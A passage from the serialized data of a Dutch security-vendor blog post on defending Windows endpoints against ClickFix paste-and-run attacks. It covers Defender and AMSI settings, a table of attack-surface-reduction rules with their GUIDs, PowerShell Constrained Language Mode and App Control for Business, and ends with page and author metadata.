app-credentialstores uit te lezen.",[526,903,904],{},"Dan Microsoft Defender. Defender AV kan de payload van de tweede stap detecteren, maar alleen met de juiste instellingen: cloud protection aanzetten en het beschermingsniveau op High of High+ zetten. AMSI, het Antimalware Scan Interface, laat applicaties inhoud tijdens runtime aan Defender doorgeven ter controle, nadat die in het geheugen is ontsleuteld of gedeobfusceerd, maar voordat die wordt uitgevoerd. PowerShell gebruikt AMSI om schadelijke code te identificeren, en AMSI heeft realtimebescherming en behavior monitoring nodig.",[526,906,907],{},"Minstens vijf attack-surface-reduction-regels zijn relevant tegen ClickFix:",[590,909,911],{"style":910},"margin: 0.5rem 0 2rem; overflow-x: auto",[912,913,827,915,827,934],"table",{"style":914},"width:100%; border-collapse: collapse; font-size: 0.85rem",[916,917,918,919,827],"thead",{},"\n    ",[920,921,922,923,922,928,922,931,918],"tr",{},"\n      ",[924,925,927],"th",{"style":926},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Regel",[924,929,930],{"style":926},"GUID",[924,932,933],{"style":926},"ClickFix-relevantie",[935,936,918,937,918,953,918,968,918,981,918,994,827],"tbody",{},[920,938,922,939,922,944,922,950,918],{},[940,941,943],"td",{"style":942},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Uitvoering van potentieel versluierde scripts blokkeren",[940,945,947],{"style":946},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[573,948,949],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[940,951,952],{"style":942},"Versluierde of gecodeerde scripts in de uitvoerings- en evasiefase",[920,954,922,955,922,959,922,965,918],{},[940,956,958],{"style":957},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","JavaScript of VBScript verhinderen gedownloade uitvoerbare inhoud te starten",[940,960,962],{"style":961},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[573,963,964],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[940,966,967],{"style":957},"WSH, .js of .vbs die gedownloade payloads starten",[920,969,922,970,922,973,922,978,918],{},[940,971,972],{"style":942},"Uitvoerbare bestanden alleen toestaan bij een prevalentie-, ouderdoms- of trusted-list-criterium",[940,974,975],{"style":946},[573,976,977],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[940,979,980],{"style":942},"Verse of zeldzame neergezette executables",[920,982,922,983,922,986,922,991,918],{},[940,984,985],{"style":957},"Uitvoerbare inhoud uit e-mailclient en webmail blokkeren",[940,987,988],{"style":961},[573,989,990],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[940,992,993],{"style":957},"Via e-mail bezorgde ClickFix-varianten",[920,995,922,996,922,999,922,1004,918],{},[940,997,998],{"style":942},"Alle Office-applicaties verhinderen kindprocessen te creëren",[940,1000,1001],{"style":946},[573,1002,1003],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[940,1005,1006],{"style":942},"Office-lokaasvarianten die interpreters starten",[526,1008,1009],{},"Rol ASR eerst in de auditmodus uit, dan als pilot, dan in de blokmodus. Tamper Protection is de laatste lijn: ze verhindert de aanvaller jullie detecties uit te schakelen.",[526,1011,1012],{},"Bij PowerShell zelf beperken jullie het risico door legacy interpreters. Identificeer en verwijder, waar haalbaar, Windows PowerShell 2.0 en legacy VBScript-componenten, waaraan de logging- en securityfeatures van nieuwere versies ontbreken. De volgende stap is de Constrained Language Mode (CLM), die de beschikbare taalelementen van PowerShell inperkt en veel scriptgebaseerde technieken blokkeert. CLM heeft alleen dan robuuste beveiligingswaarde wanneer een system application control policy hem afdwingt (App Control for Business); de varianten via omgevingsvariabele en AppLocker zijn zwakker en omzeilbaar. En veel systemen hebben de Full Language Mode nodig om te functioneren, zoals software-deployment-tooling, waardoor CLM vaak alleen in geselecteerde omgevingen haalbaar is.",[526,1014,1015],{},"Daarmee zijn we bij App Control for Business (voorheen WDAC). App Control dwingt een code-integriteitspolicy af over welke executables, scripts en drivers mogen draaien. De strategische houding is default-deny plus Microsofts aanbevolen block rules, de bekende LOLBin- en bypass-blokkeerlijst. App Control is ook het correcte enforcementpad voor de PowerShell-CLM. De script enforcement blokkeert MSHTA- en MSXML-scripthosts, dwingt PowerShell in de CLM en blokkeert niet-toegestane inzet van de Windows Script Host. Een paar gedragsfeiten zijn belangrijk:",[824,1017,827,1018,827,1021,827,1024],{"style":826},[829,1019,1020],{},"Base policies die Windows vertrouwen, blokkeren vertrouwde LOLBins niet automatisch. Jullie moeten Microsofts aanbevolen block rules inmergen om de bekende bypasses te sluiten.",[829,1022,1023],{},"App Control verhindert het starten van gesigneerde powershell.exe of cmd.exe niet. Het perkt in wat ze mogen doen (CLM, geen ongesigneerde of niet-toegestane payload) en regelt niet de inhoud van cmd.exe, .bat of .cmd. Daarom wordt het met ASR en launch-hardening gelaagd, niet alleen ingezet.",[829,1025,1026],{},"De auditmodus is niet neutraal: de script enforcement blokkeert ook in de audit de uitvoering van MSHTA en MSXML en kan het PowerShell-CLM-gedrag veranderen. Daarom moet App Control in de audit vanaf de eerste uitrol pilot- of ringbegrensd zijn, nooit vlootbreed.",[526,1028,1029],{},"App Control is de afzonderlijke control met de hoogste confidence tegen de interpreter-, LOLBin- en payload-uitvoeringsfasen en dwingt robuuste CLM af. Het draagt tegelijk de hoogste deploymentcomplexiteit en het hoogste rollbackrisico, want een misconfiguratie blokkeert de uitvoering. Voer het in via gecontroleerde pilotringen.",[552,1031,1033],{"id":1032},"waar-wij-in-het-spel-komen","Waar wij in het spel komen",[526,1035,558],{},[526,1037,1038,1039,804],{},"ClickFix is snel, en Microsofts native detecties dekken het meeste af, maar niet alles. Voor onze CSOC-klanten breiden we de dekking doorlopend uit waar gaten opduiken: uitvoering via Windows Terminal, RAT-gedreven supportscams en post-compromise-gedrag. Als jullie willen weten waar jullie omgeving staat, ",[1040,1041,1042],"a",{"href":276},"laat het ons weten",[1044,1045,1046],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":530,"searchDepth":531,"depth":531,"links":1048},[1049,1050,1051,1052,1053,1054,1055,1056,1057],{"id":554,"depth":531,"text":555},{"id":636,"depth":531,"text":637},{"id":648,"depth":531,"text":649},{"id":671,"depth":531,"text":672},{"id":783,"depth":531,"text":784},{"id":813,"depth":531,"text":814},{"id":850,"depth":531,"text":851},{"id":866,"depth":531,"text":867},{"id":1032,"depth":531,"text":1033},"post",{"lang":1060,"seoTitle":1061,"titleClass":1062,"date":1063,"categories":1064,"blogtitlepic":1065,"socialimg":1066,"customExcerpt":1067,"keywords":1068,"asideNav":1069,"published":325},"nl","ClickFix-aanvallen detecteren en verhinderen: de Win+R-paste-truc","h2-font-size","2026-09-21",[235],"head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix maakt gebruikers tot hun eigen aanvaller: een vals CAPTCHA, een copy-paste, en schadelijke code draait in het geheugen zonder dat er iets op de schijf landt. Hoe Microsoft Defender de aanval detecteert, waar de detectie tegen grenzen aanloopt en hoe jullie het gat dichten met een RunMRU-hunt en vier beschermingslagen.","ClickFix, ClickFix-aanval, ClickFix-detectie, ClickFix verhinderen, vals CAPTCHA, Win+R-aanval, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASR-regels, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, infostealer, LOLBin, PowerShell-hardening",{"menuItems":1070},[1071,1074,1077,1080,1083,1086,1089,1092,1095],{"href":1072,"text":1073},"#de-clickfix-aanvalsketen","De aanvalsketen",{"href":1075,"text":1076},"#wat-microsoft-defender-detecteert","Wat Defender detecteert",{"href":1078,"text":1079},"#waar-de-native-detectie-tegen-haar-grenzen-aanloopt","Waar het knelt",{"href":1081,"text":1082},"#het-gat-dichten-een-runmru-hunt","Het gat dichten",{"href":1084,"text":1085},"#beschermingslaag-1-de-bezorging-blokkeren","Laag 1: bezorging",{"href":1087,"text":1088},"#beschermingslaag-2-de-truc-blokkeren","Laag 2: de truc",{"href":1090,"text":1091},"#beschermingslaag-3-de-actie-blokkeren","Laag 3: de actie",{"href":1093,"text":1094},"#beschermingslaag-4-de-uitvoering-blokkeren","Laag 4: uitvoering",{"href":1096,"text":1033},"#waar-wij-in-het-spel-komen","/posts/2026-09-21-clickfix-prevent-detect",{"title":546,"description":530},"posts/2026-09-21-clickfix-prevent-detect",[1101,1102,1103],"Defender","SOC","Endpoint Security","lS01fik3j3PA11SfFEubOmZbcX5CpsIRGptr_n3mheA",[],{"id":1107,"extension":1108,"meta":1109,"stem":8,"__hash__":1120},"authors_data/authors.json","json",{"Fritz Zurhorst":1110,"Nadine Klein":1115},{"display_name":521,"avatar":1111,"permalink":1112,"linkedin":1113,"imageOffsetTop":1114},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":548,"avatar":1116,"permalink":1117,"twitter":1118,"linkedin":1119,"imageOffsetTop":1114},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383968561]